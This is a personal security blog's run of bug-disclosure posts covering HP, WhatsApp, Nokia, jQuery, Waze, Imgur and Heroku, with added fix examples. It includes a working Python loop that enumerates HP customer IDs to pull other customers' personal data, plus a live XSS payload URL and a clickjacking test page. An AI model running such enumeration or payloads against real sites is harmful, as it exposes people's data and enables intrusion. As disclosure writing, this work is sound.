<a href="https://4.bp.blogspot.com/-KLNtsz52Vwg/WfURedbt1DI/AAAAAAAADpo/Zz1rDKobq8caDYQnUL3vG9gXpDh_8ZaFgCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.53.10%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="644" data-original-width="986" height="261" src="https://4.bp.blogspot.com/-KLNtsz52Vwg/WfURedbt1DI/AAAAAAAADpo/Zz1rDKobq8caDYQnUL3vG9gXpDh_8ZaFgCLcBGAs/s400/Screen%2BShot%2B2017-10-29%2Bat%2B4.53.10%2BAM.png" width="400" /></a></div>
<br />
<br />
<br />
Apple happily fixed it in iOS 10.3.3<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-rKr9rklHUpA/WfURxi4tuoI/AAAAAAAADpw/BOIAcTujkSAFWggYpxFK520kMmBrUN5QgCLcBGAs/s1600/Screen%2BShot%2B2017-10-29%2Bat%2B4.54.06%2BAM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="1600" height="129" src="https://2.bp.blogspot.com/-rKr9rklHUpA/WfURxi4tuoI/AAAAAAAADpw/BOIAcTujkSAFWggYpxFK520kMmBrUN5QgCLcBGAs/s640/Screen%2BShot%2B2017-10-29%2Bat%2B4.54.06%2BAM.png" width="640" /></a></div>
<br />
<br />
Though I feel there was a fault on WhatsApp's side too, because when I tried the same thing on Telegram, Telegram truncated the name of the contact to around 50 characters and hence did not crash.<br />
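<p>The Telegram behaviour just mentioned is the right fix on the consuming side, and the spaces trick earlier in this post is the edge case it has to survive. Here is an added example (not WhatsApp's, Telegram's or Apple's code) of a minimal, hypothetical vCard importer that collapses whitespace in the display name and caps its length before anything else in the app sees the contact; the 50-character limit and the two sample cards are constructed for the example:</p>

```python
# Added example, not WhatsApp's or Apple's code: a contact import that bounds
# the display name the way Telegram's truncation (noted above) did, so an
# oversized FN never reaches the rest of the app. The parser is a minimal,
# hypothetical vCard 3.0 reader; MAX_NAME_LEN is a constructed limit.
MAX_NAME_LEN = 50  # roughly the "50ish" the post saw Telegram apply


def parse_vcard(text: str) -> dict:
    """Unfold continuation lines (a leading space or tab continues the
    previous line) and map property names to values; parameters after ';'
    on the property name are dropped."""
    unfolded = []
    for line in text.splitlines():
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    props = {}
    for line in unfolded:
        name, sep, value = line.partition(":")
        if sep:
            props[name.split(";")[0].strip().upper()] = value
    return props


def import_contact(text: str, max_name_len: int = MAX_NAME_LEN) -> dict:
    """Validate and normalise one vCard before it is stored.
    Whitespace runs in the name are collapsed first, so padding a name with
    spaces (the trick in the post) neither hides it nor defeats the length cap."""
    props = parse_vcard(text)
    if props.get("BEGIN", "").upper() != "VCARD" or "END" not in props:
        raise ValueError("not a vCard")
    name = " ".join(props.get("FN", "").split())
    if not name:
        raise ValueError("vCard has no display name")
    truncated = len(name) > max_name_len
    return {
        "name": name[:max_name_len],
        "tel": props.get("TEL", "").strip(),
        "truncated": truncated,
    }


# Constructed samples: a normal card and one whose FN is space-padded and oversized.
NORMAL_VCARD = (
    "BEGIN:VCARD\r\nVERSION:3.0\r\nFN:Sample Person\r\n"
    "TEL;TYPE=CELL:+10000000000\r\nEND:VCARD\r\n"
)
OVERSIZED_VCARD = (
    "BEGIN:VCARD\r\nVERSION:3.0\r\n"
    "FN:Sample" + " " * 200 + "X" * 120 + "\r\n"
    "TEL;TYPE=CELL:+10000000000\r\nEND:VCARD\r\n"
)
```

<p><code>import_contact(OVERSIZED_VCARD)</code> returns a 50-character name with <code>truncated</code> set, which is also the signal a client could log or surface rather than silently storing a record that a downstream app may choke on.</p>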
<br />
Happy crashing!<br />
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com2tag:blogger.com,1999:blog-499911195830393683.post-83081857403076699482015-10-28T17:14:00.003+05:302019-08-17T15:32:21.658+05:30Vulnerability in HP which leaked their users data <div dir="ltr" style="text-align: left;" trbidi="on">
Hi all! I am writing a blog post after a really long time. Sorry!<br />
<div>
Well, this is a bug story of HP (Hewlett-Packard). I guess everyone knows about them.</div>
<div>
<br /></div>
<b><i>The Hewlett-Packard Company is an American global information technology company headquartered in Palo Alto, California, United States.</i></b><br />
<div>
<span style="background-color: white;"><span style="font-family: "arial" , sans-serif;"><span style="font-size: 13px; line-height: 14.6545457839966px;"><b><i><br /></i></b></span></span></span></div>
A few months back, I purchased an HP laptop. After purchasing, I had to register for warranty extensions and the like, and those processes were online. After completing the process, they sent me an email saying that my order had been registered and asking me to download a certificate for it.<br />
<div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px; line-height: 14.6545457839966px;"><br /></span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-P41q1WPlCzQ/VgPseXogZBI/AAAAAAAABv0/8ZAOyXqn1z0/s1600/Hpmail1.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://4.bp.blogspot.com/-P41q1WPlCzQ/VgPseXogZBI/AAAAAAAABv0/8ZAOyXqn1z0/s640/Hpmail1.PNG" width="640" /></a></div>
<div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><span style="font-size: 13px; line-height: 14.6545457839966px;"> (CLICK ON THE IMAGE TO ENLARGE IT :) )</span></span></span></div>
<div>
<br />
<div>
Well ok!</div>
</div>
<div>
<br /></div>
<div>
On visiting the link, I was sent to a page which asked me to click and generate my certificate.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Ewr9BI6wFXw/VgPtvT2HLRI/AAAAAAAABv8/t5MqxIKgSFg/s1600/hp-cert.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://2.bp.blogspot.com/-Ewr9BI6wFXw/VgPtvT2HLRI/AAAAAAAABv8/t5MqxIKgSFg/s640/hp-cert.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Let's do that :)</div>
<div>
<br /></div>
<div>
On doing that, I was redirected to </div>
<div>
<br /></div>
<blockquote class="tr_bq">
https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1</blockquote>
Now when I looked at the URL, the parameter <b><i>customerid</i></b> looked interesting. Let's change that and check what happens. Voila!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-corTX8O3DGQ/VgPv7X643oI/AAAAAAAABwI/w1_cfUPgzWQ/s1600/data1.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="https://3.bp.blogspot.com/-corTX8O3DGQ/VgPv7X643oI/AAAAAAAABwI/w1_cfUPgzWQ/s640/data1.PNG" width="640" /></a></div>
<br />
So HP is exposing their customers'<br />
Name<br />
Address<br />
Product Serial No.<br />
Product Number<br />
Product Description<br />
HP Care Pack Serial Number<br />
<br />
BAD RIGHT?<br />
<br />
Since the ID I got was somewhere around 30394780, I guessed that a lot of data was getting exposed.<br />
<br />
I wrote a simple python code for it.<br />
<br />
<blockquote class="tr_bq">
import re<br />
import urllib.request<br />
from bs4 import BeautifulSoup<br />
<br />
# The certificate page, with the customerid left as a placeholder<br />
URL = ("http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1")<br />
<br />
customer_id = 30394790<br />
while customer_id < 30394850:<br />
    html = urllib.request.urlopen(URL.format(id=customer_id)).read()<br />
    soup = BeautifulSoup(html, "html.parser")<br />
    text = soup.get_text()<br />
    text2 = re.sub(r"\s+", " ", text).strip()  # collapse the garbage whitespace into single spaces<br />
    print("DATA OF " + str(customer_id) + "\n")  # print before incrementing so the id matches the data<br />
    print(text2)<br />
    customer_id = customer_id + 1</blockquote>
<div>
Just checking user data from id 30394790 to id 30394850.</div>
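<p>What the certificate page was missing is an object-level authorization check: the <i>customerid</i> in the URL was never tied to who was asking. Here is an added example (not HP's code) showing the vulnerable lookup beside the fixed one, with a constructed customer table, a hypothetical session shape, and a small regression check that replays the id loop above against either handler:</p>

```python
# Added example, not HP's code: the object-level authorization check the
# certificate page above was missing. Customer records and the session shape
# are constructed for the example.
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for the customer table behind customerid=...
CUSTOMERS = {
    30394780: {"name": "Customer A", "serial": "SN-EXAMPLE-0001"},
    30394781: {"name": "Customer B", "serial": "SN-EXAMPLE-0002"},
    30394782: {"name": "Customer C", "serial": "SN-EXAMPLE-0003"},
}


@dataclass(frozen=True)
class Session:
    customer_id: int             # the customer this login belongs to
    support_agent: bool = False  # explicit role allowed to view any record


def certificate_vulnerable(session: Optional[Session], customer_id: int):
    """Behaviour seen in the post: whatever id is in the URL is looked up,
    with no link to who is asking. Returns (status, record)."""
    record = CUSTOMERS.get(customer_id)
    return (200, record) if record else (404, None)


def certificate_fixed(session: Optional[Session], customer_id: int):
    """The id in the URL must match the logged-in customer unless the caller
    holds a privileged role. Foreign and missing ids both answer 404 so the
    endpoint does not become an oracle for which ids exist."""
    if session is None:
        return (401, None)
    if customer_id != session.customer_id and not session.support_agent:
        return (404, None)
    record = CUSTOMERS.get(customer_id)
    return (200, record) if record else (404, None)


def foreign_records_returned(handler, session: Session, start: int, stop: int) -> int:
    """Regression check a defender can keep: replay the post's id loop with one
    ordinary login and count records that belong to somebody else."""
    leaked = 0
    for cid in range(start, stop):
        status, _ = handler(session, cid)
        if status == 200 and cid != session.customer_id:
            leaked += 1
    return leaked
```

<p>With one ordinary login, <code>foreign_records_returned</code> counts 2 for the vulnerable handler and 0 for the fixed one. Sequential ids are not the bug in themselves; the missing ownership check is, and unguessable ids only make the same check slower to bypass.</p>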
<div>
<br /></div>
<div>
OUCH </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-sGLcbUhnq30/VgPxL5oCXyI/AAAAAAAABwQ/S_PveB9_N_Y/s1600/exploit_code.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="https://1.bp.blogspot.com/-sGLcbUhnq30/VgPxL5oCXyI/AAAAAAAABwQ/S_PveB9_N_Y/s640/exploit_code.PNG" width="640" /></a></div>
<div>
<br /></div>
Conclusion: everything is going online, and big companies are yet to realize that their customers' data is at risk. Publishing worldwide reports on cybersecurity and yet failing to protect their own customers' data is an irony.<br />
<br />
And why is leaking these serial numbers and product IDs bad? Read this story about how a pro social engineer ripped off many big companies; one of his methods included cracking the serial number pattern of a product.<br />
<br />
http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com3tag:blogger.com,1999:blog-499911195830393683.post-60099355753765084762015-03-25T16:19:00.001+05:302019-08-17T15:34:49.962+05:30The Nokia browser Bug<div dir="ltr" style="text-align: left;" trbidi="on">
Well here is an old Nokia browser bug (for Symbian) which was declared as won't fix by Nokia.<br />
<br />
<b>Test device :- Nokia 5233<br />Vulnerable application :- Nokia browser 7.3.1.33</b><br />
<br />
Everyone is quite well aware of clickjacking bugs.<br />
<br />
If you don't, then read it out.<br />
<br />
https://www.owasp.org/index.php/Clickjacking<br />
<br />
Most website owners use the X-Frame-Options header to avoid clickjacking on their website, and this header is supported by almost all browsers.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-n8UNH1uofVY/VRKNHU98sHI/AAAAAAAABos/-boGvZI4cRA/s1600/google.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://4.bp.blogspot.com/-n8UNH1uofVY/VRKNHU98sHI/AAAAAAAABos/-boGvZI4cRA/s640/google.png" width="640" /></a></div>
<br />
<br />
As it can be seen in the above image, Google uses x-frame-options. So if you try to open their website in an iframe...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Va4JzoU7KRU/VRKNmCAaIhI/AAAAAAAABo0/_PWwZv-sdcI/s1600/nothing.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="598" src="https://3.bp.blogspot.com/-Va4JzoU7KRU/VRKNmCAaIhI/AAAAAAAABo0/_PWwZv-sdcI/s640/nothing.png" width="640" /></a></div>
<br />
<br />
The website won't load. But...<br />
<br />
When the same thing:<br />
<br />
<blockquote class="tr_bq">
<html><br />
<head><br />
<title>Clickjack test page</title><br />
</head><br />
<body><br />
<p>Website is vulnerable to clickjacking!</p><br />
<iframe src="http://www.google.com" width="350" height="400"></iframe><br />
</body><br />
</html></blockquote>
was opened in the Nokia Symbian browser:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-NcYbVE60tbg/VRKN6jxRTrI/AAAAAAAABo8/975BIt2HDWo/s1600/nokia_browser_bug.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-NcYbVE60tbg/VRKN6jxRTrI/AAAAAAAABo8/975BIt2HDWo/s400/nokia_browser_bug.jpg" width="223" /></a></div>
Buuhahahah. Kind of universal clickjacking.<br />
<br />
Well, Opera browsers were not vulnerable :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Mqaae8iyZEg/VRKOV-4X_pI/AAAAAAAABpE/HK734xLH4Pw/s1600/opera.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-Mqaae8iyZEg/VRKOV-4X_pI/AAAAAAAABpE/HK734xLH4Pw/s400/opera.jpg" width="223" /></a></div>
<br />
<br />
<br />
I reported it on 21st March 2013<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-BNPZvCSSKF0/VRKO_A9qAQI/AAAAAAAABpM/m-lTVraTsZU/s1600/report.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-BNPZvCSSKF0/VRKO_A9qAQI/AAAAAAAABpM/m-lTVraTsZU/s1600/report.PNG" /></a></div>
<br />
But they said they won't fix it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-iK5JPWGwZ7I/VRKPVBPaT8I/AAAAAAAABpU/Uwh7_UEIDqE/s1600/wontfix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-iK5JPWGwZ7I/VRKPVBPaT8I/AAAAAAAABpU/Uwh7_UEIDqE/s1600/wontfix.PNG" /></a></div>
<br />
There can be many reasons for not fixing it. The best one, I guess, is that they are busy manufacturing Lumias and Symbian is out of the game :D.<br />
But they should have fixed it, because clickjacking is quite harmful in some cases and is even used as a catalyst for CSRF attacks. Suppose you are visiting some XYZ website, and a bad website owner has found a CSRF bug in it. He hides the payload in a frame inside his own web pages, sets the height and width of the frame to zero or changes the opacity to make it invisible, and everything goes unnoticed. The same applies to an XSS bug: executing XSS or CSRF inside an invisible frame raises far less suspicion than crafting a payload URL and sending emails or using your ninja S.E. tricks to take over the victim.<br />
<br />
<br />
Cheers :)<br />
Sorry for a very late post :)</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com3tag:blogger.com,1999:blog-499911195830393683.post-5570403691255822502014-01-18T03:48:00.004+05:302019-08-17T15:35:43.879+05:30Jquery xss<div dir="ltr" style="text-align: left;" trbidi="on">
A long time back I reported an XSS in jQuery's website, and a few days back I noticed that it was fixed.<br />
<br />
<i>jQuery is a multi-browser JavaScript library designed to simplify the client-side scripting of HTML. It was released in January 2006 at BarCamp NYC by John Resig.</i><br />
<br />
http://jqueryui.com/themeroller/#ffDefault=%22/%3E%3Cscript%3Ealert%28/Xss:cyberboy/%29%3C/script%3E<br />
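<p>The payload above closes a quoted attribute with <code>"/&gt;</code> and opens a script tag, which only works when the hash value is concatenated into markup unescaped. Here is an added example (not jQuery's code; <code>parseHashParams</code>, <code>fontInputUnsafe</code> and <code>fontInputSafe</code> are hypothetical names) showing the string-built attribute beside the escaped one, and a check that the rendered markup is still a single tag:</p>

```javascript
// Added example, not jQuery's code: the difference between string-building an
// attribute from a hash parameter (as the themeroller URL above exploited) and
// escaping it first. parseHashParams, fontInputUnsafe and fontInputSafe are
// hypothetical names for this illustration.

// Parse "#a=1&b=2" into an object, decoding each key and value.
function parseHashParams(hash) {
  const out = {};
  for (const pair of hash.replace(/^#/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? '' : pair.slice(eq + 1);
    out[decodeURIComponent(key)] = decodeURIComponent(value.replace(/\+/g, ' '));
  }
  return out;
}

// Escape the five characters that can break out of a quoted attribute.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable: a value containing "/> closes the attribute and the tag.
function fontInputUnsafe(ffDefault) {
  return '<input name="ffDefault" value="' + ffDefault + '">';
}

// Fixed: escaped before concatenation, so the value can never leave the attribute.
// In a live page, el.setAttribute('value', ffDefault) on a created element is
// simpler still and needs no escaping at all.
function fontInputSafe(ffDefault) {
  return '<input name="ffDefault" value="' + escapeHtmlAttr(ffDefault) + '">';
}

// Does the rendered markup still consist of exactly one <input> tag?
function isSingleInputTag(markup) {
  return /^<input(?: [a-zA-Z-]+="[^"<>]*")*>$/.test(markup);
}
```

<p>Fed the decoded hash from the URL above, <code>fontInputUnsafe</code> yields markup with a live script element while <code>fontInputSafe</code> still yields one input tag. Escaping is context-specific: this table is right for a double-quoted attribute, and a value dropped into a script block or a URL needs a different one.</p>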
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xTEYxRTBlcg/UtmrKK7rm6I/AAAAAAAABhM/1GUjcJKu0BU/s1600/jquery.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://4.bp.blogspot.com/-xTEYxRTBlcg/UtmrKK7rm6I/AAAAAAAABhM/1GUjcJKu0BU/s1600/jquery.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VLHfG2NqPjc/UtmrqKMhCeI/AAAAAAAABhU/p3Gha6GgYGw/s1600/Jqueryfix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://4.bp.blogspot.com/-VLHfG2NqPjc/UtmrqKMhCeI/AAAAAAAABhU/p3Gha6GgYGw/s1600/Jqueryfix.PNG" width="320" /></a> </div>
<br /></div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-76887477022748061982013-12-25T16:11:00.000+05:302019-08-17T15:37:40.678+05:30waze arbitrary file upload<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Waze</b> is one of the world's largest community-based traffic and navigation apps, and it was acquired by Google on <i>June 11, 2013. </i>Google opens up responsible disclosure for its acquired websites, so I thought of trying my hand at it.<br />
<div>
<br /></div>
<div>
While I was scrolling around the pages, I found the Waze wiki which allowed users to upload files :]</div>
<div>
<br /></div>
<div>
When I tried uploading a PHP file, the response was </div>
<div>
<br /></div>
<div>
<span style="color: red;"><b>Files of the MIME type "application/x-php" are not allowed to be uploaded</b></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-K58Doty4Pbc/UrC7qeuToNI/AAAAAAAABfc/k8N4UQjesTk/s1600/waze2.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://4.bp.blogspot.com/-K58Doty4Pbc/UrC7qeuToNI/AAAAAAAABfc/k8N4UQjesTk/s400/waze2.PNG" width="400" /></a></div>
<div>
<br />
<div>
Well, so the website is filtering file types by checking the MIME type, so uploading arbitrary files by extension spoofing is no use ... HMMMMMM</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Then again, something struck my mind: what other MIME types are filtered?? </div>
<div>
So I tried uploading an SWF file. BINGOOOOO!!!!!</div>
<div>
<br /></div>
<div>
SWF files are not filtered >:)<br />
<br />
So what bad can I do??</div>
<div>
<br /></div>
<div>
Aaahhaahhh, execute an XSS with a vulnerable SWF file ;-)</div>
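<p>The root cause here is that a denylist on the client-declared MIME type can only block what someone thought to list. Here is an added example (not Waze's or MediaWiki's code; helper names and the magic-byte table are constructed for the illustration) contrasting that check with an allow-list that also sniffs the first bytes, so an SWF is rejected whether it is declared honestly or renamed to .png, plus the headers to serve accepted uploads with:</p>

```python
# Added example, not Waze's or MediaWiki's code: why checking only the declared
# MIME type against a denylist lets an SWF through, and what an allow-list that
# also sniffs the content looks like. Helper names and the magic-byte table are
# constructed for this illustration.
import os

# Flash container signatures: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")

# Image types a wiki upload form might legitimately accept, with their leading bytes.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


class UploadRejected(ValueError):
    pass


def denylist_check(declared_mime: str) -> bool:
    """The behaviour observed in the post: only the client-declared type is
    consulted and only PHP is blocked, so application/x-shockwave-flash passes."""
    return declared_mime.lower() not in {"application/x-php"}


def sniff(data: bytes):
    """Identify the content from its first bytes, ignoring name and declared type."""
    if data[:3] in SWF_MAGIC:
        return "swf"
    for ext, magic in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def allowlist_check(filename: str, data: bytes) -> str:
    """Accept only a known-good extension whose bytes agree with it.
    Returns the canonical extension or raises UploadRejected."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in IMAGE_MAGIC:
        raise UploadRejected(f".{ext or '(none)'} is not an allowed upload type")
    actual = sniff(data)
    if actual != ext:
        raise UploadRejected(f"content is {actual or 'unrecognised'}, not {ext}")
    return ext


def safe_download_headers(ext: str) -> dict:
    """Serve accepted uploads so a browser never treats them as active content:
    a fixed type from our own table, no sniffing, attachment disposition."""
    ctype = {"png": "image/png", "jpg": "image/jpeg", "gif": "image/gif"}[ext]
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
    }
```

<p>Serving user uploads from a separate origin is the complementary control: even if a file does slip through, a script it carries then runs with no access to the wiki's session.</p>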
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Vh55pVxYhgY/UrC9Eba_yzI/AAAAAAAABfo/Z2j0_6Vo414/s1600/wazexss.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://1.bp.blogspot.com/-Vh55pVxYhgY/UrC9Eba_yzI/AAAAAAAABfo/Z2j0_6Vo414/s400/wazexss.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
Aweee yeahhh!!<br />
<br />
Now they have fixed the bug :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ZYXF7H-YEc8/Urq00uQeyyI/AAAAAAAABgc/agbVnBhhClc/s1600/wazefix.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://3.bp.blogspot.com/-ZYXF7H-YEc8/Urq00uQeyyI/AAAAAAAABgc/agbVnBhhClc/s400/wazefix.PNG" width="400" /></a></div>
<br />
<br />
And they sent a $100 reward for this :D, and my name will be listed in their reward hall of fame :)<br />
<br />
<a href="http://www.google.co.in/about/appsecurity/hall-of-fame/reward/">http://www.google.co.in/about/appsecurity/hall-of-fame/reward/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-A6DZljVfxCk/Urq1xPcHSVI/AAAAAAAABgk/0ltom9SYV2U/s1600/reward.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://4.bp.blogspot.com/-A6DZljVfxCk/Urq1xPcHSVI/AAAAAAAABgk/0ltom9SYV2U/s400/reward.PNG" width="400" /></a></div>
<br />
<br />
CHEERS<br />
Shashank (@cyberboyIndia)</div>
</div>
</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-23218781541442747692013-12-19T13:35:00.002+05:302019-08-17T15:38:16.561+05:30Imgur xss <div dir="ltr" style="text-align: left;" trbidi="on">
Imgur is an online image hosting service founded by Alan Schaaf in 2009 in Athens, Ohio. Imgur describes itself as "the home to the web's most popular image content, curated in real-time by a dedicated community through commenting, voting and sharing."<br />I spotted a cross-site scripting vulnerability in <a href="http://imgur.com/">http://imgur.com/</a> on 6 FEB 2013.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-xFSQrGMdc2Y/UrKn6BrR1BI/AAAAAAAABf4/mDHYrkX6CBo/s1600/imgurxss.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://1.bp.blogspot.com/-xFSQrGMdc2Y/UrKn6BrR1BI/AAAAAAAABf4/mDHYrkX6CBo/s400/imgurxss.PNG" width="400" /></a></div>
<div>
<br /></div>
I reported the issue to them the very day I found it, and they replied the same day. After 2-3 days the bug was fixed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-iW-f2hr9co4/UrKobOYBjPI/AAAAAAAABgA/iO6Q3SAHLG4/s1600/imgur.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://1.bp.blogspot.com/-iW-f2hr9co4/UrKobOYBjPI/AAAAAAAABgA/iO6Q3SAHLG4/s400/imgur.PNG" width="400" /></a></div>
<br />
Cheers :)<br />Shashank</div>
Shashankhttp://www.blogger.com/profile/06316076880219448675noreply@blogger.com0tag:blogger.com,1999:blog-499911195830393683.post-77897221877416864372013-12-04T23:31:00.001+05:302019-08-17T15:39:21.680+05:30Capture the Xss<div dir="ltr" style="text-align: left;" trbidi="on">
Everyone is aware of the CTF, and many of you might have been or still are active CTF warriors. I spotted an XSS in their blog, and they fixed it the very day.<br />
<br />
It was just a random hit: I was reading their blog and noticed an old version of the plupload file, which had a known XSS bug.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-MOdk6mCfPa0/Up9sc8OliwI/AAAAAAAABeg/CAH_3oR216o/s1600/CTFxssbug.PNG"><img border="0" height="231" src="https://2.bp.blogspot.com/-MOdk6mCfPa0/Up9sc8OliwI/AAAAAAAABeg/CAH_3oR216o/s400/CTFxssbug.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: left;">This is what happens when you get into the bad habit of XSSing everywhere.</span></div>
<br style="text-align: left;" />
<span style="text-align: left;">Anyway, they were happy, and so am I :)</span><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-TNZNMyLShJc/Up9tSh6mNdI/AAAAAAAABeo/BwB3Osu8_X4/s1600/CTF.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="https://4.bp.blogspot.com/-TNZNMyLShJc/Up9tSh6mNdI/AAAAAAAABeo/BwB3Osu8_X4/s320/CTF.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div style="text-align: left;">
Cheers :)</div>
<br />
<br /></div>
Shashank http://www.blogger.com/profile/06316076880219448675 noreply@blogger.com 1
tag:blogger.com,1999:blog-499911195830393683.post-3891461759518393797 2013-12-03T21:13:00.000+05:30 2019-08-17T15:40:20.658+05:30
Heroku Directory Traversal<div dir="ltr" style="text-align: left;" trbidi="on">
Long back I spotted a Directory Traversal bug in Heroku.<br />
<br />
"Heroku is a cloud application platform – a new way of building and deploying web apps. Heroku was acquired by Salesforce.com in 2010."<br />
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-bDDhv_sqq9E/Up356umx3GI/AAAAAAAABd4/DbD5L5G_784/s1600/herokuLFI.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://1.bp.blogspot.com/-bDDhv_sqq9E/Up356umx3GI/AAAAAAAABd4/DbD5L5G_784/s400/herokuLFI.PNG" width="400" /></a></div>
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span> They were quite quick and fixed it without delays.<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 13px; line-height: 16px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
